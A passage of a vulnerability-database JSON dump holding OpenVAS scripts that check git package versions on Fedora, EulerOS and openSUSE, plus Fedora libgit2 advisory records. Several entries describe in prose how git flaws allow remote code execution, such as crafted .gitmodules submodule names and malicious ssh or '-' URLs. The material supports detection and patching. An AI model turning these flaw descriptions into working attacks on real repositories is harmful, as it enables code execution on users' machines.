announced via the FEDORA-2018-29afefd172 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"git on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.17.2~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-21T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-d5139c4fd6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "CVE-2017-15298", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875216", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875216", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d5139c4fd6_git_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-d5139c4fd6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875216\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-21 07:28:04 +0200 (Sun, 21 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-11233\", \"CVE-2018-11235\", \"CVE-2017-15298\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-d5139c4fd6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d5139c4fd6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4P3N2PXTUEO4ANXPE6ILEE565P22K5N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.14.5~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:18", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1420)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2324", "CVE-2018-11235", "CVE-2018-17456", "CVE-2017-14867", "CVE-2017-1000117", "CVE-2014-9938", "CVE-2016-2315", "CVE-2015-7545"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191420", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1420\");\n script_version(\"2020-01-23T11:44:01+0000\");\n script_cve_id(\"CVE-2014-9938\", \"CVE-2015-7545\", \"CVE-2016-2315\", \"CVE-2016-2324\", \"CVE-2017-1000117\", \"CVE-2017-14867\", \"CVE-2018-11235\", \"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:44:01 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:44:01 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1420)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1420\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1420\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1420 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\nA shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\n\nGit before 2.10.5, 2.11.x before 2.11.4, 2.12.x before 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2 uses unsafe Perl scripts to support subcommands such as cvsserver, which allows attackers to execute arbitrary OS commands via shell metacharacters in a module name. The vulnerable code is reachable via git-shell even without CVS support.(CVE-2017-14867)\n\nIt was found that the git-prompt.sh script shipped with git failed to correctly handle branch names containing special characters. A specially crafted git repository could use this flaw to execute arbitrary commands if a user working with the repository configured their shell to include repository information in the prompt.(CVE-2014-9938)\n\nAn integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.(CVE-2016-2324)\n\nA flaw was found in the way the git-remote-ext helper processed certain URLs. If a user had Git configured to automatically clone submodules from untrusted repositories, an attacker could inject commands into the URL of a submodule, allowing them to execute arbitrary code on the user's system.(CVE-2015-7545)\n\nGit before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive 'git clone' of a superproject if a .gitmodules file has a URL field beginning with a '-' character.(CVE-2018-17456)\n\nAn in ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T16:44:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2020:0598-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1387", "CVE-2019-1350", "CVE-2019-1351", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1349", "CVE-2017-15298", "CVE-2020-5260", "CVE-2020-11008", "CVE-2018-11233", "CVE-2019-1353", "CVE-2019-19604", "CVE-2019-1348", "CVE-2019-1354", "CVE-2019-1352"], "modified": "2020-05-07T00:00:00", "id": "OPENVAS:1361412562310853136", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853136", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853136\");\n script_version(\"2020-05-07T07:41:43+0000\");\n script_cve_id(\"CVE-2017-15298\", \"CVE-2018-11233\", \"CVE-2018-11235\", \"CVE-2018-17456\", \"CVE-2019-1348\", \"CVE-2019-1349\", \"CVE-2019-1350\", \"CVE-2019-1351\", \"CVE-2019-1352\", \"CVE-2019-1353\", \"CVE-2019-1354\", \"CVE-2019-1387\", \"CVE-2019-19604\", \"CVE-2020-11008\", \"CVE-2020-5260\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 07:41:43 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-02 03:00:59 +0000 (Sat, 02 May 2020)\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2020:0598-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0598-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00003.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the openSUSE-SU-2020:0598-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for git fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2020-11008: Specially crafted URLs may have tricked the credentials\n helper to providing credential information that is not appropriate for\n the protocol in use and host being contacted (bsc#1169936)\n\n git was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from sysvinit to systemd\n service (bsc#1169605).\n\n * CVE-2020-5260: Specially crafted URLs with newline characters could have\n been used to make the Git client to send credential information for a\n wrong host to the attacker's site bsc#1168930\n\n git 2.26.0 (bsc#1167890, jsc#SLE-11608):\n\n * 'git rebase' now uses a different backend that is based on the 'merge'\n machinery by default. The 'rebase.backend' configuration variable\n reverts to old behaviour when set to 'apply'\n\n * Improved handling of sparse checkouts\n\n * Improvements to many commands and internal features\n\n git 2.25.2:\n\n * bug fixes to various subcommands in specific operations\n\n git 2.25.1:\n\n * 'git commit' now honors advise.statusHints\n\n * various updates, bug fixes and documentation updates\n\n git 2.25.0\n\n * The branch description ('git branch --edit-description') has been used\n to fill the body of the cover letters by the format-patch command, this\n has been enhanced so that the subject can also be filled.\n\n * A few commands learned to take the pathspec from the standard input\n or a named file, instead of taking it as the command line arguments,\n with the '--pathspec-from-file' option.\n\n * Test updates to prepare for SHA-2 transition continues.\n\n * Redo 'git name-rev' to avoid recursive calls.\n\n * When all files from some subdirectory were renamed to the root\n directory, the directory rename heuristics would fail to detect that as\n a rename/merge of the subdirectory to the root directory, which has been\n corrected.\n\n * HTTP transport had possible allocator/deallocator mismatch, which has\n been corrected.\n\n git 2.24.1:\n\n * CVE-2019-1348: The --export-marks option of fast-import is exposed also\n via the in-stream command feature export-marks=... and it allows\n overwriting arbitrary paths (bsc#1158785)\n\n * CVE-2019-1349: on Windows, when submodules are cloned recursively, under\n certain circumstances Git could be fooled into using the same Git\n directory twice (bsc#1158787)\n\n * CVE-2019-1350: Incorrect quoting of command-line arguments allowed\n remote code execution during a recursive clone in conjunction with SSH\n URLs (bsc#1158788)\n\n * CVE-2019-1351: on Windows mistakes drive letters outside of the\n ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret\", rpm:\"git-credential-libsecret~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret-debuginfo\", rpm:\"git-credential-libsecret-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debuginfo\", rpm:\"git-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-p4\", rpm:\"git-p4~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-19T17:48:53", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.5-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235"], "modified": "2018-07-19T17:48:53", "id": "FEDORA:9106C604A712", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5GAR2S4GMRIEBQXZU3D6ZDJQTR5C4MZH/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-19T18:06:49", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.5-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235"], "modified": "2018-07-19T18:06:49", "id": "FEDORA:38ABE605715A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2DI7CXOAS5SSCDPWYHUDJEDPVLTAFS6H/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:37", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.2}, "published": "2018-08-09T17:42:25", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.6-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235"], "modified": "2018-08-09T17:42:25", "id": "FEDORA:34C3F63D9E40", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NAFODB7GRTYS4SCIO2GNYOE4NAC7AE3P/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-14T23:31:19", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.7-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-14T23:31:19", "id": "FEDORA:AD7E26075DAB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5GMJJIDNEG42VDOEJZLJOIR6WEXXQGZ5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-16T11:41:13", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.7-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-16T11:41:13", "id": "FEDORA:DB3A56048699", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PKRWJ6IUL2V32F67UNPFRHEF5LEVL2IZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": 